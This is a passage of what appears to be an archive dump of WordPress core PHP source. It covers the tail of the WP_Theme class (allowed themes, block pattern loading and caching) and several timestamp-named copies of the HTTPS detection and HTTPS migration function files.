if ( is_file( $path_to_index_block_template ) && is_readable( $path_to_index_block_template ) ) {
$this->block_theme = true;
break;
}
}
return $this->block_theme;
}
/**
* Retrieves the path of a file in the theme.
*
* Searches in the stylesheet directory before the template directory so themes
* which inherit from a parent theme can just override one file.
*
* @since 5.9.0
*
* @param string $file Optional. File to search for in the stylesheet directory.
* @return string The path of the file.
*/
public function get_file_path( $file = '' ) {
$file = ltrim( $file, '/' );
$stylesheet_directory = $this->get_stylesheet_directory();
$template_directory = $this->get_template_directory();
if ( empty( $file ) ) {
$path = $stylesheet_directory;
} elseif ( $stylesheet_directory !== $template_directory && file_exists( $stylesheet_directory . '/' . $file ) ) {
$path = $stylesheet_directory . '/' . $file;
} else {
$path = $template_directory . '/' . $file;
}
/** This filter is documented in wp-includes/link-template.php */
return apply_filters( 'theme_file_path', $path, $file );
}
/**
* Determines the latest WordPress default theme that is installed.
*
* This hits the filesystem.
*
* @since 4.4.0
*
* @return WP_Theme|false Object, or false if no theme is installed, which would be bad.
*/
public static function get_core_default_theme() {
foreach ( array_reverse( self::$default_themes ) as $slug => $name ) {
$theme = wp_get_theme( $slug );
if ( $theme->exists() ) {
return $theme;
}
}
return false;
}
/**
* Returns array of stylesheet names of themes allowed on the site or network.
*
* @since 3.4.0
*
* @param int $blog_id Optional. ID of the site. Defaults to the current site.
* @return string[] Array of stylesheet names.
*/
public static function get_allowed( $blog_id = null ) {
/**
* Filters the array of themes allowed on the network.
*
* Site is provided as context so that a list of network allowed themes can
* be filtered further.
*
* @since 4.5.0
*
* @param string[] $allowed_themes An array of theme stylesheet names.
* @param int $blog_id ID of the site.
*/
$network = (array) apply_filters( 'network_allowed_themes', self::get_allowed_on_network(), $blog_id );
return $network + self::get_allowed_on_site( $blog_id );
}
/**
* Returns array of stylesheet names of themes allowed on the network.
*
* @since 3.4.0
*
* @return string[] Array of stylesheet names.
*/
public static function get_allowed_on_network() {
static $allowed_themes;
if ( ! isset( $allowed_themes ) ) {
$allowed_themes = (array) get_site_option( 'allowedthemes' );
}
/**
* Filters the array of themes allowed on the network.
*
* @since MU (3.0.0)
*
* @param string[] $allowed_themes An array of theme stylesheet names.
*/
$allowed_themes = apply_filters( 'allowed_themes', $allowed_themes );
return $allowed_themes;
}
/**
* Returns array of stylesheet names of themes allowed on the site.
*
* @since 3.4.0
*
* @param int $blog_id Optional. ID of the site. Defaults to the current site.
* @return string[] Array of stylesheet names.
*/
public static function get_allowed_on_site( $blog_id = null ) {
static $allowed_themes = array();
if ( ! $blog_id || ! is_multisite() ) {
$blog_id = get_current_blog_id();
}
if ( isset( $allowed_themes[ $blog_id ] ) ) {
/**
* Filters the array of themes allowed on the site.
*
* @since 4.5.0
*
* @param string[] $allowed_themes An array of theme stylesheet names.
* @param int $blog_id ID of the site. Defaults to current site.
*/
return (array) apply_filters( 'site_allowed_themes', $allowed_themes[ $blog_id ], $blog_id );
}
$current = get_current_blog_id() === $blog_id;
if ( $current ) {
$allowed_themes[ $blog_id ] = get_option( 'allowedthemes' );
} else {
switch_to_blog( $blog_id );
$allowed_themes[ $blog_id ] = get_option( 'allowedthemes' );
restore_current_blog();
}
/*
* This is all super old MU back compat joy.
* 'allowedthemes' keys things by stylesheet. 'allowed_themes' keyed things by name.
*/
if ( false === $allowed_themes[ $blog_id ] ) {
if ( $current ) {
$allowed_themes[ $blog_id ] = get_option( 'allowed_themes' );
} else {
switch_to_blog( $blog_id );
$allowed_themes[ $blog_id ] = get_option( 'allowed_themes' );
restore_current_blog();
}
if ( ! is_array( $allowed_themes[ $blog_id ] ) || empty( $allowed_themes[ $blog_id ] ) ) {
$allowed_themes[ $blog_id ] = array();
} else {
$converted = array();
$themes = wp_get_themes();
foreach ( $themes as $stylesheet => $theme_data ) {
if ( isset( $allowed_themes[ $blog_id ][ $theme_data->get( 'Name' ) ] ) ) {
$converted[ $stylesheet ] = true;
}
}
$allowed_themes[ $blog_id ] = $converted;
}
// Set the option so we never have to go through this pain again.
if ( is_admin() && $allowed_themes[ $blog_id ] ) {
if ( $current ) {
update_option( 'allowedthemes', $allowed_themes[ $blog_id ], false );
delete_option( 'allowed_themes' );
} else {
switch_to_blog( $blog_id );
update_option( 'allowedthemes', $allowed_themes[ $blog_id ], false );
delete_option( 'allowed_themes' );
restore_current_blog();
}
}
}
/** This filter is documented in wp-includes/class-wp-theme.php */
return (array) apply_filters( 'site_allowed_themes', $allowed_themes[ $blog_id ], $blog_id );
}
/**
* Returns the folder names of the block template directories.
*
* @since 6.4.0
*
* @return string[] {
* Folder names used by block themes.
*
* @type string $wp_template Theme-relative directory name for block templates.
* @type string $wp_template_part Theme-relative directory name for block template parts.
* }
*/
public function get_block_template_folders() {
// Return set/cached value if available.
if ( isset( $this->block_template_folders ) ) {
return $this->block_template_folders;
}
$this->block_template_folders = $this->default_template_folders;
$stylesheet_directory = $this->get_stylesheet_directory();
// If the theme uses deprecated block template folders.
if ( file_exists( $stylesheet_directory . '/block-templates' ) || file_exists( $stylesheet_directory . '/block-template-parts' ) ) {
$this->block_template_folders = array(
'wp_template' => 'block-templates',
'wp_template_part' => 'block-template-parts',
);
}
return $this->block_template_folders;
}
/**
* Gets block pattern data for a specified theme.
* Each pattern is defined as a PHP file and defines
* its metadata using plugin-style headers. The minimum required definition is:
*
* /**
* * Title: My Pattern
* * Slug: my-theme/my-pattern
* *
*
* The output of the PHP source corresponds to the content of the pattern, e.g.:
*
* <main><p><?php echo "Hello"; ?></p></main>
*
* If applicable, this will collect from both parent and child theme.
*
* Other settable fields include:
*
* - Description
* - Viewport Width
* - Inserter (yes/no)
* - Categories (comma-separated values)
* - Keywords (comma-separated values)
* - Block Types (comma-separated values)
* - Post Types (comma-separated values)
* - Template Types (comma-separated values)
*
* @since 6.4.0
*
* @return array Block pattern data.
*/
public function get_block_patterns() {
$can_use_cached = ! wp_is_development_mode( 'theme' );
$pattern_data = $this->get_pattern_cache();
if ( is_array( $pattern_data ) ) {
if ( $can_use_cached ) {
return $pattern_data;
}
// If in development mode, clear pattern cache.
$this->delete_pattern_cache();
}
$dirpath = $this->get_stylesheet_directory() . '/patterns';
$pattern_data = array();
if ( ! file_exists( $dirpath ) ) {
if ( $can_use_cached ) {
$this->set_pattern_cache( $pattern_data );
}
return $pattern_data;
}
$files = (array) self::scandir( $dirpath, 'php', -1 );
/**
* Filters list of block pattern files for a theme.
*
* @since 6.8.0
*
* @param array $files Array of theme files found within `patterns` directory.
* @param string $dirpath Path of theme `patterns` directory being scanned.
*/
$files = apply_filters( 'theme_block_pattern_files', $files, $dirpath );
$dirpath = trailingslashit( $dirpath );
if ( ! $files ) {
if ( $can_use_cached ) {
$this->set_pattern_cache( $pattern_data );
}
return $pattern_data;
}
$default_headers = array(
'title' => 'Title',
'slug' => 'Slug',
'description' => 'Description',
'viewportWidth' => 'Viewport Width',
'inserter' => 'Inserter',
'categories' => 'Categories',
'keywords' => 'Keywords',
'blockTypes' => 'Block Types',
'postTypes' => 'Post Types',
'templateTypes' => 'Template Types',
);
$properties_to_parse = array(
'categories',
'keywords',
'blockTypes',
'postTypes',
'templateTypes',
);
foreach ( $files as $file ) {
$pattern = get_file_data( $file, $default_headers );
if ( empty( $pattern['slug'] ) ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: 1: file name. */
__( 'Could not register file "%s" as a block pattern ("Slug" field missing)' ),
$file
),
'6.0.0'
);
continue;
}
if ( ! preg_match( '/^[A-z0-9\/_-]+$/', $pattern['slug'] ) ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: 1: file name; 2: slug value found. */
__( 'Could not register file "%1$s" as a block pattern (invalid slug "%2$s")' ),
$file,
$pattern['slug']
),
'6.0.0'
);
}
// Title is a required property.
if ( ! $pattern['title'] ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: 1: file name. */
__( 'Could not register file "%s" as a block pattern ("Title" field missing)' ),
$file
),
'6.0.0'
);
continue;
}
// For properties of type array, parse data as comma-separated.
foreach ( $properties_to_parse as $property ) {
if ( ! empty( $pattern[ $property ] ) ) {
$pattern[ $property ] = array_filter( wp_parse_list( (string) $pattern[ $property ] ) );
} else {
unset( $pattern[ $property ] );
}
}
// Parse properties of type int.
$property = 'viewportWidth';
if ( ! empty( $pattern[ $property ] ) ) {
$pattern[ $property ] = (int) $pattern[ $property ];
} else {
unset( $pattern[ $property ] );
}
// Parse properties of type bool.
$property = 'inserter';
if ( ! empty( $pattern[ $property ] ) ) {
$pattern[ $property ] = in_array(
strtolower( $pattern[ $property ] ),
array( 'yes', 'true' ),
true
);
} else {
unset( $pattern[ $property ] );
}
$key = str_replace( $dirpath, '', $file );
$pattern_data[ $key ] = $pattern;
}
if ( $can_use_cached ) {
$this->set_pattern_cache( $pattern_data );
}
return $pattern_data;
}
/**
* Gets block pattern cache.
*
* @since 6.4.0
* @since 6.6.0 Uses transients to cache regardless of site environment.
*
* @return array|false Returns an array of patterns if cache is found, otherwise false.
*/
private function get_pattern_cache() {
if ( ! $this->exists() ) {
return false;
}
$pattern_data = get_site_transient( 'wp_theme_files_patterns-' . $this->cache_hash );
if ( is_array( $pattern_data ) && $pattern_data['version'] === $this->get( 'Version' ) ) {
return $pattern_data['patterns'];
}
return false;
}
/**
* Sets block pattern cache.
*
* @since 6.4.0
* @since 6.6.0 Uses transients to cache regardless of site environment.
*
* @param array $patterns Block patterns data to set in cache.
*/
private function set_pattern_cache( array $patterns ) {
$pattern_data = array(
'version' => $this->get( 'Version' ),
'patterns' => $patterns,
);
/**
* Filters the cache expiration time for theme files.
*
* @since 6.6.0
*
* @param int $cache_expiration Cache expiration time in seconds.
* @param string $cache_type Type of cache being set.
*/
$cache_expiration = (int) apply_filters( 'wp_theme_files_cache_ttl', self::$cache_expiration, 'theme_block_patterns' );
// We don't want to cache patterns infinitely.
if ( $cache_expiration <= 0 ) {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: %1$s: The filter name.*/
__( 'The %1$s filter must return an integer value greater than 0.' ),
'<code>wp_theme_files_cache_ttl</code>'
),
'6.6.0'
);
$cache_expiration = self::$cache_expiration;
}
set_site_transient( 'wp_theme_files_patterns-' . $this->cache_hash, $pattern_data, $cache_expiration );
}
/**
* Clears block pattern cache.
*
* @since 6.4.0
* @since 6.6.0 Uses transients to cache regardless of site environment.
*/
public function delete_pattern_cache() {
delete_site_transient( 'wp_theme_files_patterns-' . $this->cache_hash );
}
/**
* Enables a theme for all sites on the current network.
*
* @since 4.6.0
*
* @param string|string[] $stylesheets Stylesheet name or array of stylesheet names.
*/
public static function network_enable_theme( $stylesheets ) {
if ( ! is_multisite() ) {
return;
}
if ( ! is_array( $stylesheets ) ) {
$stylesheets = array( $stylesheets );
}
$allowed_themes = get_site_option( 'allowedthemes' );
foreach ( $stylesheets as $stylesheet ) {
$allowed_themes[ $stylesheet ] = true;
}
update_site_option( 'allowedthemes', $allowed_themes );
}
/**
* Disables a theme for all sites on the current network.
*
* @since 4.6.0
*
* @param string|string[] $stylesheets Stylesheet name or array of stylesheet names.
*/
public static function network_disable_theme( $stylesheets ) {
if ( ! is_multisite() ) {
return;
}
if ( ! is_array( $stylesheets ) ) {
$stylesheets = array( $stylesheets );
}
$allowed_themes = get_site_option( 'allowedthemes' );
foreach ( $stylesheets as $stylesheet ) {
if ( isset( $allowed_themes[ $stylesheet ] ) ) {
unset( $allowed_themes[ $stylesheet ] );
}
}
update_site_option( 'allowedthemes', $allowed_themes );
}
/**
* Sorts themes by name.
*
* @since 3.4.0
*
* @param WP_Theme[] $themes Array of theme objects to sort (passed by reference).
*/
public static function sort_by_name( &$themes ) {
if ( str_starts_with( get_user_locale(), 'en_' ) ) {
uasort( $themes, array( 'WP_Theme', '_name_sort' ) );
} else {
foreach ( $themes as $key => $theme ) {
$theme->translate_header( 'Name', $theme->headers['Name'] );
}
uasort( $themes, array( 'WP_Theme', '_name_sort_i18n' ) );
}
}
/**
* Callback function for usort() to naturally sort themes by name.
*
* Accesses the Name header directly from the class for maximum speed.
* Would choke on HTML but we don't care enough to slow it down with strip_tags().
*
* @since 3.4.0
*
* @param WP_Theme $a First theme.
* @param WP_Theme $b Second theme.
* @return int Negative if `$a` falls lower in the natural order than `$b`. Zero if they fall equally.
* Greater than 0 if `$a` falls higher in the natural order than `$b`. Used with usort().
*/
private static function _name_sort( $a, $b ) {
return strnatcasecmp( $a->headers['Name'], $b->headers['Name'] );
}
/**
* Callback function for usort() to naturally sort themes by translated name.
*
* @since 3.4.0
*
* @param WP_Theme $a First theme.
* @param WP_Theme $b Second theme.
* @return int Negative if `$a` falls lower in the natural order than `$b`. Zero if they fall equally.
* Greater than 0 if `$a` falls higher in the natural order than `$b`. Used with usort().
*/
private static function _name_sort_i18n( $a, $b ) {
return strnatcasecmp( $a->name_translated, $b->name_translated );
}
private static function _check_headers_property_has_correct_type( $headers ) {
if ( ! is_array( $headers ) ) {
return false;
}
foreach ( $headers as $key => $value ) {
if ( ! is_string( $key ) || ! is_string( $value ) ) {
return false;
}
}
return true;
}
}
class.wp-scripts-20260605054255.php 0000666 00000000527 15224151220 0012065 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* This file is deprecated, use 'wp-includes/class-wp-scripts.php' instead.
*
* @deprecated 6.1.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '6.1.0', WPINC . '/class-wp-scripts.php' );
/** WP_Scripts class */
require_once ABSPATH . WPINC . '/class-wp-scripts.php';
https-detection-20260605112435-20260621081211-20260621134631.php 0000666 00000013341 15224151220 0014714 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260606142425-20260621081111-20260621221507.php 0000666 00000013341 15224151220 0014715 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605171925-20260621081108.php 0000666 00000011205 15224151220 0013360 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605120245-20260621081201.php 0000666 00000013341 15224151220 0013327 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
